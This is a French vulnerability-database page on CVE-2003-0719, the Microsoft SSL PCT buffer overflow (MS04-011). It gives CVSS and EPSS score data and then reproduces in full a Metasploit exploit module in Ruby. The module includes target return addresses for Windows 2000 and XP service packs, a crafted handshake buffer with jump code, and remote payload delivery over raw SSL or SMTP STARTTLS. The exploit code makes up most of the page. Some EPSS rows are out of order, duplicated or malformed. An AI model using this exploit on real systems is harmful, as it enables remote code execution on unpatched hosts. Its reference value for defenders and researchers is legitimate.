CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
87.31%
–
–
2023-03-12
–
–
–
94.35%
–
2023-03-26
–
–
–
95.02%
–
2023-10-29
–
–
–
95.57%
–
2024-06-02
–
–
–
95.76%
–
2024-11-10
–
–
–
95.76%
–
2024-12-22
–
–
–
96.24%
–
2025-02-16
–
–
–
96.4%
–
2025-01-19
–
–
–
96.24%
–
2025-02-16
–
–
–
96.4%
–
2025-03-18
–
–
–
–
75.98%
2025-03-30
–
–
–
–
76.22%
2025-03-30
–
–
–
–
76.22,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-09-19 22h00 +00:00 Auteur : Metasploit EDB Vérifié : Yes
##
# $Id: ms04_011_pct.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Private Communications Transport Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Microsoft
Windows SSL PCT protocol stack. This code is based on Johnny
Cyberpunk's THC release and has been tested against Windows
2000 and Windows XP. To use this module, specify the remote
port of any SSL service, or the port and protocol of an
application that uses SSL. The only application protocol
supported at this time is SMTP. You only have one chance to
select the correct target, if you are attacking IIS, you may
want to try one of the other exploits first (WebDAV). If
WebDAV does not work, this more than likely means that this
is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS
5.1). Using the wrong target may not result in an immediate
crash of the remote system.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2003-0719'],
[ 'OSVDB', '5250'],
[ 'BID', '10116'],
[ 'MSB', 'MS04-011'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1800,
'BadChars' => "",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Windows 2000 SP4',
{
'Platform' => 'win',
'Ret' => 0x67419ce8, # jmp [esp + 0x6c]
},
],
[
'Windows 2000 SP3',
{
'Platform' => 'win',
'Ret' => 0x67419e1d, # jmp [esp + 0x6c]
},
],
[
'Windows 2000 SP2',
{
'Platform' => 'win',
'Ret' => 0x6741a426, # jmp [esp + 0x6c]
},
],
[
'Windows 2000 SP1',
{
'Platform' => 'win',
'Ret' => 0x77e4f44d, # jmp [ebx + 0x14]
},
],
[
'Windows 2000 SP0',
{
'Platform' => 'win',
'Ret' => 0x7658a6cb, # jmp [ebx + 0x0e]
},
],
[
'Windows XP SP0',
{
'Platform' => 'win',
'Ret' => 0x0ffb7de9, # jmp [esp + 0x6c]
},
],
[
'Windows XP SP1',
{
'Platform' => 'win',
'Ret' => 0x0ffb832f, # jmp [esp + 0x6c]
},
],
],
'DisclosureDate' => 'Apr 13 2004',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"])
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...")
# This is a heap ptr to the ssl request
# ... and just happens to not die ...
# Thanks to CORE and Halvar
#
# 80620101 => and byte ptr [esi+1], 0x2
# bd00010001 => mov ebp, 0x1000100
# 0016 => add [esi], dl
# 8f8201000000 => pop [esi+1]
# eb0f => jmp short 11 to shellcode
buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
"\xeb\x0f" + 'XXXXXXXXXXX' +
[target.ret ^ 0xffffffff].pack('V')+
payload.encoded
# Connect to a SMTP service, call STARTTLS
if (datastore['PROTO'] == 'smtp')
greeting = sock.get_once
sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n")
resp = sock.get_once
sock.put("STARTTLS\r\n")
resp = sock.get_once
if (resp and resp !~ /^220/)
print_status("Warning: this server may not support STARTTLS")
end
end
sock.put(buf)
resp = sock.get_once
if (resp == "\x00\x00\x01")
print_status("The response indicates that the PCT protocol is disabled")
end
handler
disconnect
end
end